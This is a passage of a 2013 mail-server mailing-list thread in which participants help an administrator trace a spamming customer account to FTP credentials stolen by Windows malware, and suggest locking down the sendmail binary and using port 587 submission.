                                > send mail via pickup, such as logwatch, pflogsumm, etc. Thus restricting
                                > which users can execute the sendmail binary is a better solution.

                                I'll work towards that later today

                                I'm still perplexed with access: the user claims no one else had ftp
                                password, ftp password was a random 8-char alpha/numeric string,
                                can there be any other reason that leaked password...?
                              • Stan Hoeppner
                                ... Look at every file in this user s publicly accessible directory tree. You may find that s/he saved the username/password in a text file (regardless of file
                                Message 15 of 18 , Oct 8, 2013
                                • 0 Attachment
                                  On 10/8/2013 7:15 PM, lists@... wrote:
                                  > On Wed, October 9, 2013 10:41 am, Stan Hoeppner wrote:
                                  >> On 10/8/2013 3:08 PM, lists@... wrote:
                                  >
                                  > Stan, Michael and other who responded, thanks
                                  >
                                  >> Others responded with some good ideas here, mostly locking down PHP
                                  >> itself so it can't use the sendmail binary. But it sounds like this is a
                                  >> generic web hosting server for your customers. Which means they may be
                                  >> using all manner of languages other than PHP, such as Perl, Java, etc.
                                  >
                                  > modified php.ini as per Micheal's suggestion;
                                  > yes, it is as you suggest, 'all manner..';
                                  >
                                  >> In this case, the most thorough way to lock this down, other than
                                  >> disabling the pickup service in master.cf, is to restrict execute
                                  >> permissions on the sendmail binary to root. This prevents all web
                                  >> applications from using the pickup service. Then instruct all of your
                                  >> users to use the submission service on TCP 587 for sending mail.
                                  >> Disabling pickup is the easiest and quickest way to stop this spamming
                                  >> permanently. But it will likely break management functions that need to
                                  >> send mail via pickup, such as logwatch, pflogsumm, etc. Thus restricting
                                  >> which users can execute the sendmail binary is a better solution.
                                  >
                                  > I'll work towards that later today
                                  >
                                  > I'm still perplexed with access: the user claims no one else had ftp

                                  Look at every file in this user's publicly accessible directory tree.
                                  You may find that s/he saved the username/password in a text file
                                  (regardless of file extension, or name), which is quite common for many
                                  users, especially those who don't update the site but once every few
                                  weeks, months, etc. They bookmark the URL and "remember" the
                                  credentials this way when they need to work on the site. Crackers will
                                  often find such files, even if not exposed anywhere in the HTML content
                                  of the site.

                                  > password, ftp password was a random 8-char alpha/numeric string,
                                  > can there be any other reason that leaked password...?

                                  There are all manner of ways credentials can fall into the wrong hands.
                                  Above is only one. The simplest is the Post-it note, both literally
                                  and metaphorically. You can't control this. What you can is the
                                  password itself, and the frequency of change. Random passwords are
                                  meaningless if someone can simply copy or steal the Post-it. Changing
                                  passwords regularly helps mitigate this problem, but not if users simply
                                  put the new password in an accessible file, as in the scenario above.

                                  --
                                  Stan
                                • Robert L Mathews
                                  ... There are several Windows PC viruses, including the common Gumblar family, that steal saved FTP passwords from files on the computer. They simply have a
                                  Message 16 of 18 , Oct 10, 2013
                                  • 0 Attachment
                                    On 10/8/13 5:15 PM, lists@... wrote:

                                    > I'm still perplexed with access: the user claims no one else had ftp
                                    > password, ftp password was a random 8-char alpha/numeric string,
                                    > can there be any other reason that leaked password...?

                                    There are several Windows PC viruses, including the common "Gumblar"
                                    family, that steal saved FTP passwords from files on the computer.

                                    They simply have a list of file locations where various FTP clients such
                                    as FileZilla and Dreamweaver store saved passwords. They scan all these
                                    locations and send any results back to a central server.

                                    Some of these viruses also incorporate network sniffing to detect FTP
                                    passwords.

                                    So even if the password was random and used only on a single computer,
                                    it may have been obtained by evildoers if the user checked a "remember
                                    this password" option or ever connected to a non-TLS FTP server. The
                                    user should scan any computer that ever used this password for viruses.

                                    --
                                    Robert L Mathews, Tiger Technologies, http://www.tigertech.net/
                                  • lists@...
                                    ... Robert, thanks for explanation, that makes a lot of sense in this scenario, and, the most likely reason (I guess I couldn t see the forrest for the
                                    Message 17 of 18 , Oct 10, 2013
                                    • 0 Attachment
                                      On Fri, October 11, 2013 4:56 am, Robert L Mathews wrote:
                                      > On 10/8/13 5:15 PM, lists@... wrote:

                                      > There are several Windows PC viruses, including the common "Gumblar"
                                      > family, that steal saved FTP passwords from files on the computer.
                                      > They simply have a list of file locations where various FTP clients such
                                      > as FileZilla and Dreamweaver store saved passwords. They scan all these
                                      > locations and send any results back to a central server.

                                      Robert,

                                      thanks for explanation, that makes a lot of sense in this scenario, and,
                                      the most likely reason (I guess I couldn't see the forrest for the
                                      trees...)

                                      Voytek
                                    • lists@...
                                      ... fwiw, just followed it with the user, he now confirmed his PC did have a malware issue few month ago, after he oppened your parcel delivery zip file, etc
                                      Message 18 of 18 , Oct 10, 2013
                                      • 0 Attachment
                                        On Fri, October 11, 2013 10:49 am, lists@... wrote:
                                        > On Fri, October 11, 2013 4:56 am, Robert L Mathews wrote:

                                        >> There are several Windows PC viruses, including the common "Gumblar"
                                        >> family, that steal saved FTP passwords from files on the computer. They

                                        > thanks for explanation, that makes a lot of sense in this scenario, and,
                                        > the most likely reason

                                        On Wed, October 9, 2013 3:52 pm, Stan Hoeppner wrote:

                                        > Look at every file in this user's publicly accessible directory tree.
                                        > You may find that s/he saved the username/password in a text file

                                        fwiw, just followed it with the user, he now confirmed his PC did have a
                                        malware issue few month ago, after he oppened 'your parcel delivery' zip
                                        file, etc

                                        and, he did have p/w stored on infected PC

                                        thanks again for all help and suggestions to everyone,
                                      Your message has been successfully submitted and would be delivered to recipients shortly.